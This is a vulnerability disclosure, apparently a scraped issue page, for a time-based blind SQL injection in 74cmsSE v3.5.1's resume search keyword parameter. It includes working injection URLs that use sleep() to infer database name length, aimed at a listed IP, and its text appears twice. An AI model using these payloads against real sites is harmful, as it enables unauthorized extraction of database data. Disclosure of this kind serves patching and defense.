Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.5.1 Date of Discovery: 21/4/2022 Product version: 74cmsSE_v3.5.1 Download link:http://www.74cms.com/downloadse/show/id/68.html Vulnerability Description:
74cmsSE_v3.5.1 has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data.
As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is "qscms2" , and the delay as exactly double the length of database(), so the injection is successfull
It's a time-based SQL injection
Suggest: Add a filter function to this parameter
The text was updated successfully, but these errors were encountered:
Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.5.1
Date of Discovery: 21/4/2022
Product version: 74cmsSE_v3.5.1
Download link:http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
74cmsSE_v3.5.1 has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data.
POC:
Payload:
/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
In the path:
/v1_0/home/resume/index
is not strictly filtered for $keyword, resulting in SQL injection
exp1:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
As you can see from the figure above, the sleep() function is executed, and there is a time blind-SQL
With the payload test above it is possible that the sleep() function being executed twice.
Time blinds are possible to guess the length of the database:
exp2:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is "qscms2" , and the delay as exactly double the length of database(), so the injection is successfull
It's a time-based SQL injection
Suggest: Add a filter function to this parameter
The text was updated successfully, but these errors were encountered: